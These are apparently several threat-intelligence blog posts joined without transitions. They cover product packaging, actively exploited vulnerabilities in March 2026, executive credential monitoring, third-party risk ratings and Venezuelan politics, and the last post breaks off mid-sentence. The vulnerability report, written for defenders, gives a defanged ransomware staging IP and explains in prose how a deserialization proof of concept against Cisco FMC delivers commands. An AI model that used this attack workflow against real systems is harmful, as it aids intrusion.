Digital Risk Protection helps detect and disrupt threats that never touch your network but directly damage your business: brand impersonation, domain abuse, credential leaks, and phishing infrastructure across the open, deep, and dark web. With access to active infostealer logs and automated IAM remediation, your team can act on exposures within hours, not weeks.

Third-Party Risk delivers continuous, intelligence-driven monitoring of your vendor ecosystem. Security ratings combined with real-time threat intelligence surface breaches, ransomware activity, and dark web exposure days or weeks before formal vendor notification, giving your security and GRC teams evidence they can act on and defend to stakeholders.

Payment Fraud Intelligence identifies stolen payment cards, compromised checks, scam merchants, and web-skimming activity earlier in the fraud lifecycle, so financial institutions can stop losses before they materialize.

Each solution delivers complete, end-to-end capability for its risk domain. And because all four run on the same Intelligence Graph®, a signal detected in one domain immediately enriches context across the others.

Three Packages That Scale With Your Program

Modern organizations operate across multiple risk domains. We are introducing three packages that reflect that reality, meeting customers where they are and scale as their programs mature.

• Core is the foundation for intelligence-led security. It enables organizations to tackle essential use cases on day one - threat detection and alert triage, vulnerability monitoring, credential exposure detection, domain abuse monitoring, and executive impersonation protection. The package combines capabilities across Cyber Operations and Digital Risk Protection solutions, providing immediate, high-impact coverage.
• Professional is built for organizations ready to mature their program and operationalize intelligence at scale. Building on Core, it introduces deeper insights and automation to extend team capacity - enabling autonomous threat hunting, multi-source correlation, and external asset discovery. The result is broader coverage, faster response, and more leverage for security teams without adding headcount.
• Elite delivers the most comprehensive intelligence coverage available. By unifying Cyber Operations, Digital Risk Protection, and Third-Party Risk, it provides a complete view of risk across infrastructure, brand, and supply chain. With a single pane of glass, Elite operationalizes intelligence across workflows and teams—from CTI to SOC to Risk—driving smarter and faster risk-enabled decision making and response.

Across all packages, customers get full access to the Intelligence Graph®, Recorded Future AI, all compatible integrations, APIs, and Collective Insights. No hidden costs or barriers to connect to your existing security stack.

Built for Everyone Who Needs Intelligence, Not Just Analysts

Intelligence only creates value when the right people can act on it. That's why our platform packages include unlimited users. Every analyst, every engineer, every stakeholder who needs intelligence gets it, with no seat limits and no trade-offs about who gets access.

For smaller teams building early-stage programs, we still offer flexible user-based licensing so you can start where it makes sense and expand as your program matures. Either way, pricing is predictable. You know what you're paying, and you can scale with confidence.

Every package also includes unlimited integrations from Recorded Future’s hundreds of supported applications at no additional cost. Your SIEMs, EDRs, SOAR platforms, and ticketing systems all get equipped with real-time intelligence, so every analyst and engineer working in those tools benefits from enriched context without switching screens. Add Autonomous Threat Operations, and those same integrations become the foundation for autonomous hunting, detection, and prevention across your entire stack. Connected tools become an intelligence-led defense system that acts continuously, with minimal human intervention.

One Intelligence Foundation Across Every Domain

What makes this approach powerful isn't just simpler packaging. All four solutions and all three packages run on the same intelligence foundation: the Intelligence Graph®, correlating over 1.2 million sources and 26 billion entities across cyber, digital, third-party, and fraud domains.

A credential leak detected in Digital Risk Protection immediately informs a Cyber Operations investigation. A vulnerability under active exploitation triggers prioritized patching in your workflow. A third-party vendor breach surfaces before the vendor discloses it. Intelligence flows across your entire risk surface, giving you the correlated, high-confidence context that point solutions can't deliver.

That's what it means to be intelligence-led. Not consuming more data. Connecting signals across domains so you can act earlier, with greater confidence, at machine speed.

The Path Forward

Adversaries in 2026 are faster, more coordinated, and more resourceful than they've ever been. They operate across every attack surface simultaneously, and they're accelerating.

Whether you're a team of three building your first intelligence program or a global enterprise running intelligence-led autonomous operations, there's a clear path. Start with the solution or package that matches your priorities today. Grow into deeper automation and broader coverage as your program matures. And at every step, you're backed by the most comprehensive and independent intelligence platform in the industry.

We built this for the threats you're facing right now, and the ones coming next.

These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.

One vulnerability (CVE-2017-7921 affecting Hikvision) is approximately nine years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Legacy and unpatched systems remain attractive targets. Defenders should not discount older CVEs; instead, they should prioritize based on observed activity, maintain strong asset visibility, and apply compensating controls where remediation is not possible.

In March, Insikt Group® created Nuclei templates for a high-severity path traversal vulnerability in MindsDB (CVE-2026-27483) and a critical missing authentication vulnerability in Nginx UI (CVE-2026-27944). Additionally, Insikt Group® had already published a Nuclei template for CVE-2025-68613 (n8n) in December, prior to its exploitation this month. We also identified public proof-of-concept (PoC) exploits for 10 of the 31 vulnerabilities.

Quick Reference: March 2026 Vulnerability Table

All 31 vulnerabilities below were actively exploited in March 2026. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.

Table 1: List of vulnerabilities that were actively exploited in March based on Recorded Future data.

Key Trends: March 2026

• Most commonly observed weaknesses: CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection).
• Two vulnerabilities and one exploit kit (consisting of 23 exploits, 12 of which are currently associated with specific CVEs) were linked to malware campaigns.
  • Interlock Ransomware Group exploited a zero-day in Cisco Secure Firewall Management Center to compromise enterprise networks, deploy custom remote access trojans (RATs), and facilitate ransomware operations.
  • Separately, the DarkSword iOS full-chain exploit enabled Safari-based remote code execution (RCE), sandbox escape, and kernel-level access, leading to deployment of the GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads.
  • The Coruna exploit kit similarly compromised iOS devices to deliver the PlasmaLoader (PLASMAGRID) malware.
• 9 of the 31 vulnerabilities (CVE-2026-3910, CVE-2026-33017, CVE-2025-32432, CVE-2025-54068, CVE-2026-20963, CVE-2025-68613, CVE-2025-26399, CVE-2021-30952, and CVE-2023-41974) allowed attackers to conduct RCE.
  • These 9 vulnerabilities affected Google, Langflow, Craft CMS, Laravel, Microsoft, n8n, SolarWinds, and Apple.

Exploitation Analysis

This section analyzes two of the highest-impact, actively exploited vulnerabilities this month. Where applicable, it also highlights the availability of Nuclei templates created by Insikt Group®. The full list of reports and detection rules from March is available to customers in the Recorded Future Intelligence Operations Platform.

Interlock Ransomware Group Exploits Cisco FMC Zero-Day (CVE-2026-20131)

On March 18, 2026, Amazon Threat Intelligence published an analysis detailing an ongoing Interlock ransomware campaign exploiting CVE-2026-20131. CVE-2026-20131 is a critical vulnerability affecting Cisco’s Secure Firewall Management Center (FMC) software that allows unauthenticated threat actors to execute arbitrary Java code as root on vulnerable devices. Cisco Secure FMC is a centralized management platform that allows administrators to configure, monitor, and control Cisco firewall devices and network security policies across an enterprise environment. According to Amazon Threat Intelligence, Interlock Ransomware Group exploited CVE-2026-20131 as a zero-day vulnerability beginning January 26, 2026, indicating active exploitation prior to its public disclosure and enabling early compromise of enterprise networks.

The Interlock Ransomware Group exploits vulnerable Cisco FMC instances via crafted HTTP requests exploiting CVE-2026-20131 to execute arbitrary Java code as root. After gaining access, the threat actors deploy a malicious ELF binary from a staging server at 37[.]27[.]244[.]222 (Intelligence Card) to support follow-on operations.

They then use custom Java- and JavaScript-based RATs, a memory-resident web shell, and proxy infrastructure to maintain access, enable lateral movement, and evade detection. Post-compromise activity includes reconnaissance, data collection and staging, and the use of legitimate tools such as ConnectWise ScreenConnect, Volatility, and Certify for remote access, credential theft, and privilege escalation.

Insikt Group® obtained a screen locker sample (SHA256: 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f) shared by Amazon Threat Intelligence from Recorded Future Malware Intelligence. Sandbox analysis detected the sample as benign. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:

• Changes the machine’s desktop wallpaper that displays a pornographic image
• Delays execution using the Sleep API function for evasion
• Detects debuggers using the GetTickCount API function to compare timing

Figure 1: Risk Rules History from Hash Intelligence Card® for 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f in Recorded Future (Source: Recorded Future)

Recorded Future customers can find additional exploitation details and MITRE ATT&CK techniques associated with the exploitation of Cisco FMC Zero-Day (CVE-2026-20131) in the Diamond Models section of this TTP Instance.

Critical Deserialization of Untrusted Data Vulnerability Affecting Cisco Secure FMC Software and Cisco SCC Firewall Management (CVE-2026-20131)

On March 11, 2026, GitHub user Sadaf Athar Khan (sak110 on GitHub) shared an alleged proof-of-concept PoC exploit for CVE-2026-20131. CVE-2026-20131 is a critical Deserialization of Untrusted Data vulnerability affecting Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management. Cisco Secure FMC Software is a web-based platform for centrally managing firewall policies, events, and device administration. Cisco SCC Firewall Management is a Software-as-a-Service-based (SaaS) solution for centralized configuration, monitoring, and maintenance across firewall deployments.

Exploitation of CVE-2026-20131 allows an unauthenticated remote threat actor to execute arbitrary code and gain root privileges on the affected devices. On March 4, 2026, Cisco published a security advisory and released software updates to fix CVE-2026-20131. The vulnerability resides in the web-based management interface of FMC, where insecure deserialization of a user-supplied Java byte stream allows threat actors to pass serialized objects into Java object handling without sufficient validation. As a result, an unauthenticated remote threat actor can send a crafted serialized Java object to the management interface, trigger arbitrary code execution, and escalate privileges to root.

Figure 2: Vulnerability Intelligence Card® for CVE-2026-20131 in Recorded Future (Source: Recorded Future)

Based on Sadaf Athar Khan’s repository, the PoC requires a target URL and a command. Once provided, the PoC generates a malicious Java-serialized object using ysoserial, embedding the supplied command within the payload and preparing it for delivery to the specified target.

The PoC then attempts to submit the serialized object to a set of candidate endpoints included in the PoC that accept serialized Java data. A reachable deserialization path allows the application to process the object and run the embedded command on the target host. After delivery, the PoC checks the server’s HTTP response codes and treats an HTTP 500 response as an indication that deserialization triggered command execution. The PoC flags HTTP 200 for manual verification because exploitation could succeed without returning visible output.

Insikt Group® has not tested this PoC for accuracy or efficacy. Recorded Future customers can find MITRE ATT&CK techniques associated with the alleged PoC in the Entities section of this TTP Instance.

Take Action

Timely and relevant information on vulnerabilities in your environment and that of your vendors and suppliers is critical for reducing risk. Find out how Recorded Future can support your team by increasing visibility, improving efficiency, and enabling confident decisions.

Vulnerability Intelligence – Prioritize vulnerabilities based on the likelihood of exploitation – not just the severity. Easily understand the risk of exploitation alongside severity, and real-time contextualized intelligence to help you quickly make confident decisions, patch what matters, and prevent attacks.

Attack Surface Intelligence – Identify internet-facing assets vulnerable to a specific CVE. Attack Surface Intelligence provides an outside-in view of your organization to help you actively discover, prioritize, and respond to unknown, vulnerable, or misconfigured assets.

Third-Party Intelligence – Gain an external view of the security posture of your vendors and partners. Eliminate time-consuming research and vendor communication cycles with the ability to promptly assess vulnerabilities in their internet-facing systems.

Insikt Group® – Receive access to exclusive reports on new vulnerabilities and trends from Recorded Future’s team of experts, the Insikt Group®. Download Nuclei templates created by Insikt Group® for select CVEs to test potentially vulnerable instances.

Recorded Future Professional Services – Work with our Professional Services team on a Vulnerability Analysis Engagement. Designed to equip your team with advanced strategies for identifying, prioritizing, and mitigating threats effectively, this program delves into technologies and operations essential for a successful vulnerability management program. (Learn more about how our Professional Services team can help your elevate your team by watching our recent Vulnerability Prioritization Workshop)

VIP Credential Monitoring in Recorded Future is built to solve this problem. It continuously monitors for credential exposures tied to your most sensitive individuals across both work and personal accounts, and alerts your team fast enough to act before an account takeover occurs.

The Challenge with Protecting Your Most Targeted People

According to Verizon's 2025 Data Breach Investigations Report, credential abuse was the most prominent initial access vector observed across breaches. Attackers don't need to find a technical vulnerability to get inside your organization. Stolen credentials are widely available across criminal forums and dark web marketplaces, and buying access is often faster and cheaper than building an exploit.

What makes this particularly calculated is how threat actors decide which credentials to buy. Infostealer malware logs don't just capture usernames and passwords — they capture the authorization URLs where those credentials were entered. According to Recorded Future’s 2025 Identity Threat Landscape Report, 7 million credentials were indexed with identifiable authorization URLs, with 63.2% of those having been linked to authentication systems.

Figure 1: Top authorization URL categories, 2025 (Source: Recorded Future)

That means attackers can usually identify the access endpoints credentials unlock and they will prioritize accordingly. Executives and anyone with broad access to systems and data sit at the top of that list.

The 2025 cyber attack on University of Pennsylvania illustrates exactly how this plays out. A threat actor compromised a single employee's SSO credential and used it to move laterally across corporate systems, ultimately exposing data on approximately 1.2 million donors, alumni, and students. One credential, one login, and an organizational crisis.

The threat doesn't stop at corporate accounts. When attackers can't get hold of an executive's work credentials, they target personal accounts for these high-value targets. A personal email or social account can expose sensitive communications, private information, or material an attacker can use for extortion.

Corporate security controls don't extend to personal accounts. When those credentials are stolen, most security teams have no line of sight.

That gap between exposure and discovery is where the risk lives. Credentials stolen by infostealer malware are often purchased and weaponized within 48 hours of the compromise, potentially days or weeks before a security team has any indication something is wrong. For standard employee accounts, that window is serious. For your CEO or Head of Engineering, it's critical.

Monitoring Built for High-Value Targets

VIP Credential Monitoring provides continuous monitoring and alerting on compromised credentials for your high-value targets. Security teams can add personal or work email addresses for their executives and others with widespread access.

From that point forward, Recorded Future continuously monitors for those accounts across its full source coverage: infostealer malware logs from 30+ malware families, dark web forums, criminal marketplaces, paste sites, and breach dumps. When a VIP credential surfaces in that data, the team receives an alert with full contextual detail (malware family, authorization URL, compromised host information, etc.) so they can act with confidence.

Many executive monitoring solutions surface credential data that is days or weeks old by the time it reaches an analyst. By then, the window to get ahead of an attacker has often closed. For all stolen credentials indexed in 2025, Recorded future detected 36.4% within 24 hours of exfiltration, and 52.9% within one week.

The gap between when credentials are stolen and when a security team finds out is where breaches happen. Recorded Future closes that gap.

When a VIP credential appears in exposure data, teams can initiate a password reset, review active sessions, or reach out directly to the individual — all before the credential is exploited. For identities that carry this level of organizational risk, getting ahead of the exposure isn't just operationally valuable; it can be the difference between a resolved alert and a significant incident.

A Complete Picture of Identity Exposure

VIP Credential Monitoring is built on the same intelligence infrastructure that powers Recorded Future Identity Intelligence broadly: the same source coverage, the same detection engine, the same alert and triage workflow. It applies that capability to a category of identities that warrant closer attention, without requiring a separate tool, process, or integration. That's the logic behind Identity Intelligence as a whole: a unified view of credential exposure across every category of identity your organization needs to protect, covering employees, customers, and your highest-risk individuals.

For teams already using Identity Intelligence to monitor employee and customer credentials, VIP Monitoring is a targeted extension of coverage that fits into what they've already built. Any VIP credentials identified will benefit from the same core features of Identity Intelligence.

This includes Incident Reports, which surfaces any other credentials that may have been compromised from the same machine, and Customizable Alerting, which streamlines prioritization of these detections and can trigger response workflows through existing integrations with Okta, Microsoft Entra ID, XSOAR, Splunk, and others.

Attackers don't limit their targets to one type of account, and your monitoring shouldn't either. To see where you stand today, request a free Identity Exposure Assessment Report and get a concrete, evidence-based picture of your organization's credential exposure over the past year. Contact us to learn more about how Recorded Future can help your organization protect its identities and to see a demo of the platform in action.

Today, the average enterprise works with hundreds of third parties. Threat actors actively target the weakest links across those supply chains, not because the vendors themselves are the prize, but because they're the path of least resistance into larger, more valuable targets.

Ransomware groups list vendors on extortion sites before those vendors even know they've been compromised. Stolen employee credentials surface on dark web forums undetected. Critical vulnerabilities are weaponized in hours, not months. In this environment, a security rating is necessary. But it is nowhere near sufficient.

Recognized in the 2026 Forrester Wave™

Recorded Future was recently included in The Forrester Wave™: Cybersecurity Risk Ratings Platforms, Q2 2026. (The report is available online to Forrester customers or for purchase here).

We see this recognition as a reflection of the market's evolution — and as an acknowledgement of the direction we've been building toward.

We believe the cybersecurity risk ratings market is at an inflection point. Analysts and practitioners alike recognize that the category is moving beyond standalone ratings toward integrated intelligence and actionable insights. We see our inclusion in this evaluation as confirmation that the convergence of hygiene data and threat intelligence isn't a niche play — it's where the market is heading. In light of where the ratings market is today, let’s dive into where Recorded Future is going and how Recorded Future envisions the future of securing the third-party ecosystem.

The Gap Between Hygiene and Intelligence

Cyber risk ratings have earned their place in the security stack. They provide a standardized, scalable way to evaluate a vendor's external security posture — patching cadence, encryption practices, DNS configuration, exposed services. That hygiene baseline matters. It's a correlative signal for breach potential, and it gives risk teams a common language for comparing vendors and benchmarking against industry peers.

But hygiene ratings only answer part of the problem: How well is this vendor maintaining their defenses?

They don't tell you whether anyone is actively trying to breach those defenses. They don't surface the dark web chatter on a specific vendor. They don't alert you when a vendor's credentials are leaked or has an active malware infection. This is the gap that has left third-party risk programs perpetually reactive. Teams learn about vendor compromises from news headlines or from the vendors themselves — often days or weeks after the initial breach. By then, the window for proactive response may have closed.

From our own customer conversations, we hear that security and risk teams have shifted from wanting ratings and accuracy alone to demanding intelligence that reveals real cybersecurity risk, with prioritized findings and actionable remediation guidance. Ratings are increasingly commoditized. The differentiation now lies in what you do with the data, and what additional signals you bring to the table.

Third-Party Risk Management Is an Intelligence Operation

If you accept that ratings alone aren't enough, the logical next step is clear: third-party risk management must be treated as an intelligence operation.

That means combining the hygiene baseline — the outside-in view of a vendor's security posture — with real-time threat intelligence that tells you who is being targeted, how, and what you should do about it. It means shifting from periodic assessments to continuous monitoring. It means equipping risk teams with the context to distinguish between a low-priority configuration issue and a vendor whose infrastructure is actively under attack. This is the problem Recorded Future Third-Party Risk was built to solve.

We've brought together two distinct capabilities that, until now, existed in separate worlds.

1. RiskRecon — built over a decade as one of the industry's leading cyber risk ratings platforms, trusted by 21,500+ users across 30+ industries, provides the hygiene foundation: transparent, evidence-backed security ratings evaluated across 40+ criteria in 9 security domains, with 99% audited data accuracy.
2. Recorded Future's threat intelligence capabilities, powered by collection and analysis across more than 1 million sources, adds the threat dimension: real-time alerting on ransomware extortion activity, dark web exposures, credential leaks, and active vulnerability exploitation — often before the affected vendor is even aware.

Together, these capabilities create something the market hasn't had before: a single solution that covers the full lifecycle of third-party risk, from initial assessment and onboarding through continuous monitoring and incident response.

What This Looks Like in Practice

The value of combining hygiene ratings with threat intelligence isn't theoretical. Our customers are already seeing it play out.

• When a vendor appears on a ransomware extortion site, Third-Party Risk customers can receive alerts in hours — not the days or weeks it takes for vendor self-disclosure.
• When credentials associated with a monitored vendor surface on dark web markets, risk teams can initiate outreach and remediation before those credentials are weaponized.
• When a critical vulnerability is disclosed, intelligence context helps analysts determine which vendors are actually exposed and at risk of exploitation, rather than treating every vendor with the affected software as equally urgent.

Customers consistently report a roughly 33% increase in visibility into third-party risks after adopting the platform (UserEvidence). Teams save an average of 7 hours per week that was previously spent on manual research and monitoring (UserEvidence). And customers routinely detect vendor incidents before the vendor itself has disclosed — turning what used to be a reactive scramble into a controlled, proactive response.

These aren't incremental improvements. They represent a fundamental shift from reactive compliance to proactive risk management.

Where We're Going

We're not done. Bringing RiskRecon and Recorded Future together was the first step in a broader vision for what third-party risk management should become.

Our roadmap is focused on deepening the integration between these two platforms into a unified experience. One where hygiene ratings, threat intelligence, and risk workflows operate seamlessly together. We're investing in AI-driven capabilities that will help risk analysts cut through noise faster, automate routine assessment workflows, and surface the insights that matter most. And we're building toward predictive intelligence that doesn't just tell you what's happening now, but helps you anticipate where risk is headed.

The goal is straightforward: make third-party risk management as data-driven, automated, and intelligence-led as the best security operations programs already are.

Join the Shift to Intelligence-Driven Third-Party Risk

Third-party risk programs that rely exclusively on hygiene ratings will continue to be caught off guard. The vendors who score well on a Tuesday can be breached by Wednesday. The questionnaire response you received last quarter may not reflect today's reality.

The organizations that are getting ahead of this are the ones treating third-party risk as what it actually is: an intelligence operation that requires continuous monitoring, real-time alerting, and the context to act decisively when something changes.

That's the future we're building. And we believe we're the only ones building it with the depth of intelligence and the strength of ratings data required to get it right.

Venezuelan Acting President Delcy Rodríguezʼs policy decisions will affect economic and political stability in Venezuela in the coming months. Her approach will likely be shaped by a deep familiarity with the state security apparatus, her revolutionary identity, a demonstrated willingness to break from orthodoxy and seek coordination with Washington, an interest in restoring support for the ruling United Socialist Party of Venezuela PSUV, and a long memory for perceived slights. These principles, paired with changing local power dynamics after the January 3, 2026, United States US special operation to capture former Venezuelan President Nicolás Maduro and his wife, Cilia Flores, suggest Rodríguez is very likely to prioritize near-term governability and economic stabilization over maximalist ideological positioning. At the same time, she will likely find ways to cooperate with the US in ways designed to preserve the rule of PSUV and her credibility with other members of the ruling coalition. Rodríguezʼs core objectives are very likely to preserve PSUV rule and resist an opposition-led transfer of power, while maximizing the economic benefits of reengagement with Washington, including sanctions relief, investment, and a possible economic recovery. This will likely contribute to Rodríguez governing in a manner that avoids high-risk moves that could fracture her coalition or trigger instability that undermines her utility to the White House. In this approach, the biggest internal threat she faces in the short term is very likely PSUV rivals, including Interior Minister Diosdado Cabello, and other military and economic elites who perceive US engagement as a direct threat to their interests. While it is impossible to predict every move the Venezuelan government may take, public and private organizations can better anticipate risks to stability and investments — such as resistance to US-supported reforms or evidence of internal divisions in the regime — by systematically monitoring the rhetoric and actions of Delcy Rodríguez, Diosdado Cabello, and other senior officials using the Recorded Future® Intelligence Operations Platform

Key Findings

• The January 3, 2026, US operation provoked panic among Venezuelan elites and fueled deep uncertainty regarding the plan to succeed Maduro, which was only resolved when US signaling prompted Venezuelan institutions to confirm that Rodríguez would assume presidential duties.
• Rodríguezʼs hold on power is threatened internally by rival PSUV figures, chief among them Interior Minister Diosdado Cabello and his network of allies across Venezuelaʼs security apparatus and among pro-government armed groups.
• Externally, the main threats to Rodríguezʼs power stem from US leverage over Caracas, including US geopolitical aims to bring Venezuela further under Washingtonʼs influence as well as US officialsʼ stated pursuit of a transition and support for the opposition faction led by María Corina Machado.
• To avoid a destabilizing rupture that could trigger US backlash, Delcy Rodríguez will very likely prioritize internal governability and economic stabilization, cooperating with Washington enough to see sustained sanctions relief while seeking to manage rather than expel hardline rivals from her coalition.
• To preserve her own credibility and influence in Venezuela, Rodríguez is likely to pair compliance with Washingtonʼs demands with “face-savingˮ gestures that assert Venezuelan sovereignty, and to resist genuinely competitive elections unless economic gains materially improve the PSUVʼs electoral odds.

Assessing Current Dynamics in Venezuela

Over the past 25 years, US-Venezuela relations have worsened as Venezuela’s government actively sought to oppose US interests in the Western Hemisphere, deepened relations with US rivals around the globe, and became increasingly authoritarian. This began under the deceased former president Hugo Chávez, whose movement, known as “Chavismo,” has governed the country since 1999. After Nicolás Maduro took power in Venezuela following Chávez’s death in 2013, he accelerated the consolidation of power and the erosion of democratic institutions begun by his predecessor. The US responded by imposing financial and oil sanctions meant to limit Venezuela’s ability to profit from its vast oil reserves and sanctioning over 200 members of the Venezuelan elite. The US pressure campaign on Venezuela accelerated in late 2025 under President Donald Trump, who deployed a historic number of naval assets to the Caribbean.

This military campaign culminated at around 02:00 Venezuelan Standard Time (VET) on January 3, 2026, when US special forces carried out airstrikes and a surgical intervention into Venezuela as part of an operation to capture and extract Maduro and his wife, Cilia Flores, to face drug trafficking and terrorism charges in New York. These events were the most significant US military operation in Latin America since the 1989 invasion of Panama, and ratified a new US doctrine that emphasizes primacy and willingness to use all available tools (economic, diplomatic, and military) to advance US interests in the Western Hemisphere, as laid out in the 2025 National Security Strategy. In Venezuela, the events of January 3 precipitated the most impactful shakeup of the country’s political order in decades.

While Acting President Delcy Rodríguez has signaled an openness to working with US priorities, this cooperation is affected by active tensions among the ruling elite and longstanding mistrust between Washington and Caracas. Understanding the events of January 3, 2026, and the immediate aftermath is crucial to evaluating the state of play on the ground and in the bilateral relationship.

Uncertainty in the Immediate Aftermath of the US Operation

In the immediate aftermath of the January 3 operation, there was widespread uncertainty in Venezuela regarding the future of PSUV rule. While the constitutional line of succession makes clear that the vice president should assume power in the president’s absence, initial messages from Venezuelan officials emphasized solidarity with Maduro and Flores rather than offering clarity on the future of PSUV governance. There was no official public reaction to the operation from the Venezuelan government until 04:14 VET, when former Defense Minister Vladimir Padrino López published a video on social media condemning the attack. He stated that Venezuela’s military — the Bolivarian Armed Forces (FANB) — was declaring a national emergency and deploying at strategic points around the country and called for unity against “imperialist threats.” Statements from Venezuelan officials since then confirmed the raid but did not clarify the makeup of the Venezuelan government.

Figure 1: Venezuelan state TV broadcast showing Rodríguez presiding over a meeting of the

Council of National Defense (Source: Telesur)

The first clarity on Venezuela’s future leadership came from Washington. At roughly 11:50 EST (12:50 VET), US president Donald Trump gave a public address in which he explicitly stated that Washington would work with Rodríguez as it assumed a more direct role in overseeing the country’s energy and security policies. Trump also said that María Corina Machado, the most popular opposition figure in the country (who had been outside the country since December 2025 and is currently in Washington) did not “have the support within or the respect within the country” to rule. While Trump claimed that Rodríguez had been "sworn in," Rodríguez’s hold on power was not publicly ratified until 15:20 VET. At that time, state television aired footage of the Council of National Defense, a body made up of the main institutional leaders of the country, featuring Rodríguez chairing the meeting and Cabello, López, and National Assembly President Jorge Rodríguez (Delcy Rodríguez’s brother) present. It was not until roughly 22:00 VET that state media began circulating a decision from the Constitutional Chamber of the Venezuelan Supreme Tribunal of Justice (TSJ) that made clear that Rodríguez would assume the duties of the president. In its ruling, the TSJ invoked a Chávez-era precedent to overrule constitutional language that would otherwise require her to schedule an early election, effectively indicating that Rodríguez is very likely seeking a mandate until Maduro’s term ends in January 2031. Neither Rodríguez nor any other official has yet made this claim explicit, and US officials have suggested that new elections should be held before then. On January 5, she was officially sworn into office in a televised ceremony held in the National Assembly in the presence of key figures in the regime and diplomats from China, Iran, Russia, and Cuba.

US-Venezuela Relations Since January 3

Since January 3, the US has generally signaled support for a working relationship with Delcy Rodríguez, while making clear that Washington expects full cooperation with its energy and security priorities. In the immediate aftermath of the operation, President Trump told reporters that he might consider a second strike if Rodríguez did not cooperate, but then, on January 9, announced on Truth Social that he had “cancelled the previously expected second Wave of Attacks” in response to the Venezuelan government releasing a number of political prisoners. Since this announcement, Trump has sought to 1 convey that he and Rodríguez work closely together. On March 5, 2026, Trump posted on social media that Rodríguez is “doing a great job, and working with US Representatives very well.”

US Secretary of State Marco Rubio has also expressed a willingness to work with Rodríguez’s interim government, but provided more explicit emphasis on a transition as the ultimate end goal of US policy. Speaking to reporters on January 7, Rubio described the US approach as consisting of three main phases: stabilization, recovery, and transition. Stabilization, he stated, is needed to prevent Venezuela from “descending into chaos,” which would be avoided by US control over oil-sale proceeds. Rubio clarified that the “recovery” phase would be aimed at reopening the oil sector to US and other Western firms, and it would ultimately be followed by a “process of transition” that would include reconciliation among Venezuelans. This three-phase framing has been echoed by other US officials, although to date, no fixed timeframe for a transition has been made public. US officials have also said that severing Venezuela’s ties to Russia, China, Cuba, and other US geopolitical adversaries is a top priority in the relationship.

US-Venezuela coordination on energy policy appears to be advancing rapidly. On January 29, Venezuela’s PSUV-controlled National Assembly passed a reform to the country’s Organic Hydrocarbons Law, aimed at increasing autonomy for private companies involved in the country’s oil and gas industry. While the revised law continues to assert state ownership over hydrocarbon reserves, it broadens the mechanisms through which private companies can participate in upstream activity, including allowing private operators — via contracts with state-owned energy company Petróleos de Venezuela S.A. (PDVSA) or joint ventures — to assume operational control while retaining a share of production. The reform also introduces a much more flexible framework for royalties and taxes, which can be set on a case-by-case basis by the Ministry of Energy, with royalties of up to 30% and taxes of up to 15%. Previous windfall taxes have been eliminated in this reform.

US support for revitalized energy cooperation with Venezuela has been enthusiastic, and President Trump has actively encouraged US and other Western oil companies to invest as much as $100 billion in Venezuela. Two days after the passage of the Organic Hydrocarbons Law reforms, the US sent Chargé d’Affaires Laura Dogu, who leads the Venezuela Affairs Unit out of the US Embassy in Colombia, to Caracas, where she is tasked with overseeing the restoration of diplomatic ties with Venezuela. While Dogu has conveyed US support for closer relations, she has reiterated US support for an eventual transition. On February 2, she met with Rodríguez, and afterward posted on X that in the meeting she reiterated “the three phases that Secretary Rubio has outlined for Venezuela: stabilization, economic recovery and reconciliation, and transition.”

In the wake of the Organic Hydrocarbons Law reform, the US Treasury Department’s Office of Foreign Assets Control (OFAC) issued a series of general licenses allowing US and other Western companies to produce, refine, transport, and sell oil without seeking individual exemptions, effectively lifting sanctions that had previously restricted these activities (see Appendix A). These OFAC licenses mandate that any authorized transactions with Venezuela's government or state energy company PDVSA must follow US laws (with disputes being resolved in the US), and that payments to the Venezuelan government or any other Venezuelan sanctioned entity be made into a US-overseen fund. US support for energy investment in Venezuela was emphasized from February 11 to 12, when US Energy Secretary Chris Wright led a delegation to Caracas to meet with Rodríguez, becoming the highest-ranking US official to visit Venezuela in years.

Figure 2: US Energy Secretary Chris Wright examining crude oil at a PDVSA project site with Rodríguez (Source: Social Media)

Internal and External Threats Confronting Acting President Rodríguez

Since Acting President Rodríguez took over from Maduro in the immediate aftermath of the US operation on January 3, she has voiced support for cooperation with Washington — but her incentives to cooperate fully are very likely limited. Rodríguez is aware of Washington’s “three point plan” for Venezuela and is likely supportive of US plans to stabilize the country, lift sanctions, and promote investment. However, she is almost certainly seeking to preserve her rule and a government led by the PSUV, and will very likely resist any attempt to preside over a transition of power to an opposition-led government. Her ability to do so will very likely depend on her ability to consolidate power and manage potential spoilers within her own coalition, as well as her ability to deepen cooperation with US interests and demonstrate utility to the White House. In doing so, she faces a number of internal and external threats to her rule, which include challenges by rivals inside the ruling PSUV over the next six to twelve months, and pressure by Washington to hold new elections over the next twelve to twenty-four months.

Internal Threats to Rodríguez’s Rule

The main internal threat to Rodríguez’s power in the short term is other members of the ruling elite. She has steadily worked to consolidate power and secure the support of the military and intelligence services, but her support among the country’s political and economic sectors is far from settled. There are almost certainly key figures in the security forces, the business community, and in the ruling party who view Rodríguez, and her relationship with the US, as a challenge to the previous status quo and its associated privileges, economic arrangements, and patronage schemes. They may be concerned about their future influence, immunity

As Rodríguez continues to establish her rule, some of these individuals may seek to oppose her, either by seeking to derail or sabotage her rapprochement with Washington or by openly rebelling against her. In this context, an attempted palace coup cannot be ruled out. Her primary rivals include the following figures and networks, each of whom has a distinct power base and incentive to view Rodríguez as an adversary or rival:

